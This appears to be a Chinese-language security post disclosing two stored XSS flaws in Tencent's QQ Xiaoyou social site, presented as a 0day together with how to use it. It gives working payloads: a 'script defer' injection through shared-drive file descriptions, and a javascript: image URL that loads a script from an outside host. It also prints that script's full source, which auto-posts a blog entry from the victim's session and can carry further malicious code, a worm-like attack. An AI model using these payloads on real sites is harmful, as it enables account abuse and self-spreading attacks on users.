QQ校友XSS 0day及使用

作者已通知騰訊。

漏洞一:

qq校友 班級共享硬盤 上傳文件時對文件描述沒有做任何過濾,導致XSS。

qq校友使用了Ajax技術(shù)， 來顯示文件列表。 在文件Msharemsg.js中使用innerHTML輸出文件列表的HTML代碼。 由于使用了innerHTML， 所以直接插入代碼: <script>alert('孤鴻影')</script>不會被執(zhí)行。 使用下面的格式既可：<script defer>alert('孤鴻影')</script>。 加入defer屬性， 那么瀏覽器在下載腳本的時候就不會立即對其進行處理， 而是繼續(xù)對頁面進行下載和解析。 這樣我們插入的JavaScript就能正常運行。

漏洞二:

qq校友在發(fā)blog時對插入圖片過濾不嚴格， 存在xss漏洞

在發(fā)blog時將插入圖片URL寫為如下代碼即可觸發(fā)：

javascript:document.write('%3C%73%63%72%69%70%74%20%73%72%63%3D%22http://xxxxxx.com/xy.js%22%3E%3C%2F%73%63%72%69%70%74%3E');xy.js的作用是自動發(fā)布一篇日志,這篇日志中可以插入惡意代碼,代碼如下：var url="/index.php?mod=blog&act=dopost";

var content="blog_content=By%3A%E5%AD%A4%E9%B8%BF%E5%BD%B1&blog_title=XSS+test&category=%E4%B8%AA%E4%BA%BA%E6%97%A5%E8%AE%B0";   //日志內(nèi)容,這里可以插入惡意代碼

function _sd_Post(Url,  Args)

{

var xmlhttp;

var error;

eval('try {xmlhttp  = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {xmlhttp  = null;error=e;}');

if(null != xmlhttp)

{

xmlhttp.Open("POST",  Url, false);

xmlhttp.setRequestHeader("x-requested-with",  "XMLHttpRequest");

xmlhttp.setRequestHeader("Referer",  "http://xy.qq.com/api_proxy.html");

xmlhttp.setRequestHeader("Accept",  "application/json, text/javascript, */*");

xmlhttp.setRequestHeader("Content-Type",  "application/x-www-form-urlencoded");

xmlhttp.setRequestHeader("Host",  "xy.qq.com");

xmlhttp.Send(Args);

strText = xmlhttp.responseText;

}

}

_sd_Post(url,content);